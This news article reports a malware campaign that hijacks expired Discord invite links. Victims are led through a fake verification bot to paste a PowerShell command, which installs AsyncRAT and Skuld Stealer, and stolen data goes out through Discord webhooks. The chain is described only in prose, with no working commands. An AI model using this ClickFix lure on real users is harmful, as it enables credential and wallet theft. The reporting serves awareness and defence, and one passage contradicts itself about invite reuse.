New Malware Campaign Exploits Discord Invite Links
A recent wave of cyberattacks has emerged, taking advantage of a vulnerability within Discord’s invitation system. This threat involves a sophisticated malware called Skuld and the AsyncRAT remote access trojan, which can compromise sensitive information and control users’ systems.
The Attack Mechanism
According to cybersecurity firm Check Point, attackers have found a way to hijack expired or deleted Discord invite links. By registering vanity links, they can covertly redirect users from trusted sources to malicious servers. This multi-layered attack incorporates the ClickFix phishing tactic along with time-based evasion techniques, making it difficult for users to detect the threat.
Understanding Discord’s Invite System
Discord’s invite mechanism allows users to create temporary, permanent, or custom invite links. These links can theoretically be reused if they are created as custom vanity invites. However, the platform typically does not allow recovered expired or deleted links to be claimed by others, thus highlighting a significant flaw in the system. Check Point’s analysis reveals that the ability to reuse certain invite codes enables attackers to reclaim them for nefarious purposes, redirecting unsuspecting users towards malicious servers.
The Phishing Campaign
The current investigation follows a previous phishing campaign, where attackers similarly exploited expired vanity invite links to manipulate users into joining fraudulent Discord servers. Once on these servers, victims were prompted to verify their identities, inadvertently leading them to phishing sites designed to drain their digital assets.
The User Experience
When users click on a previously trusted invite link, they may find themselves on a fake Discord server that mirrors a legitimate one. To gain full access to these malicious servers, users are required to authorize a bot that guides them through a verification process. This step deceptively encourages them to click a "Verify" button, which initiates an unauthorized JavaScript action.
The Technical Breakdown
Clicking the "Verify" button triggers a series of actions that appear harmless. Users are instructed to launch their Windows Run dialog and paste a PowerShell command that has been extracted onto their clipboard. This seemingly innocuous step downloads a PowerShell script from a website like Pastebin, which then retrieves a first-stage downloader. Eventually, this process executes AsyncRAT and Skuld Stealer on the victim’s machine.
AsyncRAT and Skuld Stealer
AsyncRAT is designed for comprehensive remote control of infected systems. A unique feature of this malware involves using a "dead drop resolver" to connect to a command-and-control server via a Pastebin file. In conjunction, Skuld Stealer operates as a Golang-based information thief, targeting sensitive data from various sources, including Discord, web browsers, and digital wallets.
Educational users of crypto wallets should be particularly vigilant. Skuld has been observed to extract sensitive seed phrases and passwords from wallets like Exodus and Atomic, employing techniques that hijack legitimate application functionalities.
Evasion and Exfiltration Techniques
This malware operation capitalizes on trusted cloud platforms such as GitHub, Bitbucket, and Pastebin, effectively camouflaging its activity among regular data traffic. Researchers have noted that this strategy allows the malware to remain undetected for longer periods.
After successful extraction, the collected data is transferred back to the attackers via Discord webhooks, further complicating detection efforts. Additionally, Check Point has identified multiple campaigns from the same group, distributing similar malicious payloads under various guises, including game-hacking tools.
Geographic Impact
The campaigns have predominantly targeted users in the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the United Kingdom. This broad reach underscores the global impact of this malware.
Conclusion
As cybercriminals find new and innovative ways to exploit social media platforms like Discord, it’s imperative for users to remain cautious. The ease with which trusted links can be hijacked and the strategic deployment of sophisticated malware serve as a stark reminder of the risks inherent in digital communication. Staying informed and vigilant is key to protecting oneself from these emerging threats.
